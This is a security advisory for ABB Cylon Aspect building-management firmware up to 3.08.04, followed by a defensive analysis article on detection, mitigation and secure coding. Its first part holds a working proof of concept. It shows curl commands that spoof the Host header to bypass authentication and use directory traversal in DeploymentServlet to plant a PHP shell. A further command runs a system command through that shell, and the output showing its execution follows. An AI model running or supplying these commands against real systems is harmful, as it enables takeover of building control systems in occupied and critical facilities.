ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.04
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: ABB Cylon Aspect BMS/BAS is vulnerable to a critical flaw in the
AuthenticatedHttpServlet within its application server, enabling
remote attackers to bypass authentication by setting the Host:
127.0.0.1 header. This deceives the server into processing requests
as if they originate from localhost, granting unauthorized access
to privileged operations. This bypass grants access to privileged
functionality, including the DeploymentServlet, which is vulnerable
to directory traversal. By leveraging this, an attacker can write
arbitrary PHP files outside the intended directory scope. When combined,
these issues allow remote attackers to upload a malicious PHP shell
and execute system commands with the privileges of the web server,
leading to full system compromise.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5954
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5954.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl "http://192.168.73.31:7226/servlets/DeploymentServlet\
> ?RequestType=DeploySource\
> &filename=../../../home/MIX_CMIX/htmlroot/zsl.php\
> &directory=/" \
> --data-binary @zsl.php \
> -H "Host: 127.0.0.1" \
> -H "Content-Type: application/octet-stream"
<HTML><HEAD><TITLE>200 Successful</TITLE></HEAD><BODY>200 Successful</BODY></HTML>
$ curl http://192.168.73.31/zsl.php?cmd=id;ls -al zsl.php
uid=48(apache) gid=48(apache) groups=48(apache),0(root) context=system_u:system_r:httpd_t:s0
-rw-r--r--. 1 root root 106 Jun 4 13:29 zsl.phpABB Cylon Aspect 3.08.04 — DeploySource Remote Code Execution (RCE) Overview
This article analyzes a critical vulnerability affecting ABB Cylon Aspect (firmware up to and including 3.08.04) that allowed remote authenticated flows to escalate into full remote code execution. The goal is to provide defenders, operators, and incident responders with a clear technical summary, safe detection techniques, remediation guidance, and hardening recommendations — without providing exploit instructions.
Key facts
- Vendor: ABB Ltd.
- Product line: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
- Affected firmware: versions up to and including 3.08.04
- Vulnerability class: Authentication bypass + directory traversal leading to remote code execution
- Reported by: Gjoko "LiquidWorm" Krstic
- Reference advisory: ZSL-2025-5954 (see vendor and independent advisory links in Resources)
What happened — high-level description
A web application component within the Aspect building management solution exposed an authenticated servlet with flawed logic for trusting incoming HTTP Host headers. When certain requests were treated as originating from localhost, privileged operations became accessible without proper authentication. One of these privileged operations handled file deployment; that operation also failed to correctly validate file paths, enabling directory traversal. Combined, these flaws could allow an attacker to place executable content on the system in a web-accessible location and then trigger it to execute with the web server's privileges, resulting in complete compromise of the appliance or the host running the application.
Technical analysis (defender-oriented)
The vulnerability chain contains two distinct but related weaknesses:
- Trusting untrusted Host headers: The server accepted a supplied Host header and applied a logic path that implicitly elevated trust (for example, treating requests as internal/localhost). This is a logic/authorization flaw — servers must never grant elevated privileges solely on client-supplied headers.
- Insufficient path canonicalization in file deployment: The deployment endpoint placed uploaded content on the server without robust canonicalization and enforcement of an allowed base directory. This allowed directory traversal sequences to escape the intended target directory.
When chained, an attacker who could reach the servlet could gain elevated ability to write files to locations reachable by the web server and then execute code. The impact ranges from theft of credentials and data exfiltration to complete system takeover, depending on server configuration and privileges.
Root causes
- Implicit trust of client-supplied HTTP headers (Host or similar) to determine request origin or authentication/authorization state.
- Lack of robust canonicalization and whitelist enforcement for file paths when performing file operations.
- Insufficient isolation between internal administrative interfaces and externally reachable network interfaces.
Impact and risk
- Severity: Critical — unauthenticated or bypassed-auth flows leading to remote code execution are high-impact.
- Confidentiality/Integrity/Availability: All can be completely compromised.
- Likely targets: Internet-exposed or poorly segmented management interfaces for Building Management/Automation systems.
- Operational impact: Potential service disruption, lateral movement inside OT/IT networks, safety implications in industrial/critical facilities.
Detection (non-actionable, defensive)
Detecting exploitation or probing attempts should focus on identifying anomalous requests and post-compromise artifacts. Below are defensive approaches and safe indicators of compromise (IOCs) you can use:
- Audit web server and application logs for requests to administrative servlets (e.g., DeploymentServlet or other management endpoints). Look for unexpected POST requests, large binary payloads, or unusual query parameters.
- Search system and webroot directories for recently created or modified files with unexpected filenames or web-executable extensions (e.g., .php, .asp, .cgi) that were not deployed through approved change processes.
- Monitor process creation and network connections from web server processes. New shell processes or outbound connections triggered by the web process are strong indicators of compromise.
- Use file integrity monitoring (FIM) to detect new files placed outside allowed deployment directories or changes to startup scripts and webserver configuration files.
- Review authentication and access logs for unexpected administrative actions coming from non-privileged or remote IP addresses.
Example defensive queries (conceptual)
- Search web logs for accesses to deployment endpoints and filter for unexpected client IPs or abnormal header values.
- List files in webroot and system directories sorted by modification time to spot recent additions created by web server user accounts.
Note: Keep detection techniques focused on identifying anomalies. Avoid publishing exploit requests or exact attack payloads.
Mitigations and remediation
Immediate defensive steps and long-term remediation are both important. Treat the product as high-risk until patched and validated.
Short-term (compensating) controls
- Network-level isolation: Block external access to management interfaces. Place BMS/BAS devices behind VPNs or management VLANs and limit access with firewall rules.
- Restrict administrative endpoints: Implement access control lists (ACLs) on the web server or reverse proxy to permit only trusted management subnets.
- Web application firewall (WAF): Deploy a WAF with rules to block suspicious requests to management servlets or with anomalous header patterns. Tune to reduce false positives.
- File system protections: Enforce filesystem permissions so web processes cannot write to directories outside a designated, minimal content directory. Use mandatory access controls (SELinux, AppArmor) to constrain web server privileges.
Long-term fixes
- Apply vendor patches and firmware updates as soon as they are available from ABB. This is the definitive fix for product code issues.
- Ensure secure coding practices in future releases: never grant privilege based on untrusted headers; perform strict canonicalization and whitelist checks for file paths; and enforce least privilege for web processes.
- Perform a full security review and regression testing for administrative endpoints and file-deployment subsystems.
Secure coding guidance and hardening examples
Below are safe, defensive code patterns illustrating two mitigations: validating trusted Host/origin decisions and canonicalizing/sanitizing file paths. These are intended for developers and maintainers to reduce the risk of similar issues.
// Java (conceptual) - Host validation and origin check
// High-level pattern: compare incoming Host header against a configured, expected value.
// Do NOT rely solely on request headers for authentication or privileged decision-making.
String hostHeader = request.getHeader("Host");
String trustedHost = config.get("trusted.host"); // set in config, NOT from user input
if (hostHeader == null || !hostHeader.equalsIgnoreCase(trustedHost)) {
// Treat as untrusted; apply normal auth flow or reject
response.sendError(HttpServletResponse.SC_FORBIDDEN, "Invalid host");
return;
}
// Proceed, but still enforce authentication and authorization for privileged operations.
Explanation: The snippet shows a defensive check that compares the Host header to a server-configured trusted host value. This prevents elevating trust based solely on a client-supplied header. In practice, decisions about authentication/authorization should use session tokens, TLS client authentication, or other robust mechanisms, and not rely on headers.
// Java (conceptual) - Path canonicalization and whitelist enforcement
// Accept a target filename/path from an upload, but ensure it stays within an allowed base directory.
Path baseDir = Paths.get("/opt/aspect/deployments").toRealPath(LinkOption.NOFOLLOW_LINKS);
Path candidate = baseDir.resolve(requestedFileName).normalize().toRealPath(LinkOption.NOFOLLOW_LINKS);
if (!candidate.startsWith(baseDir)) {
throw new SecurityException("Attempted directory traversal");
}
// Proceed to write the file at 'candidate' with safe file APIs.
Explanation: This pattern uses canonicalization (toRealPath & normalize) and then enforces that the resolved path is within a known base directory. Reject any input that would cause an escape. Avoid performing string-based checks alone — canonicalization avoids tricks like symlinks and encoded sequences.
Incident response guidance
- Isolate affected systems immediately from untrusted networks; preserve volatile logs and memory if possible for forensic analysis.
- Identify indicators of compromise (new web-executable files, unexpected processes, outbound connections) and collect evidence for analysis.
- Rotate credentials and secrets that may have been accessible to the compromised host, including service accounts and API keys.
- Rebuild or restore affected devices from known-good images after removing the root cause and applying patches; do not rely on in-place cleanup alone if persistence is suspected.
- Coordinate disclosure and remediation with the vendor and follow applicable regulations for critical infrastructure incidents.
Detection and monitoring checklist for operators
| Task | Why it matters |
|---|---|
| Block management ports at perimeter | Prevents remote exploitation attempts from the internet |
| Enable FIM on webroot and config directories | Rapidly detect unauthorized file additions and modifications |
| Monitor web server process behavior | Detect unexpected commands or outbound connections from web processes |
| Keep firmware and software up to date | Patches fix logic and validation bugs that can otherwise be chained |
References and resources
- Vendor product pages and security advisories: check ABB’s official support/security portal for patches and guidance.
- Independent advisory: ZSL-2025-5954 (detailed report and timeline) — consult for context and remediation status.
- Secure coding resources: OWASP guidance on Path Traversal and Header Injection for developers.
Final recommendations
Treat building management systems and other OT/IT converged platforms as high-value, high-risk targets. Apply network segmentation, least privilege, strict patch management, and runtime protections. If you operate ABB Cylon Aspect devices at the affected firmware levels, prioritize isolating those devices, applying vendor updates, and performing comprehensive audits for any signs of compromise.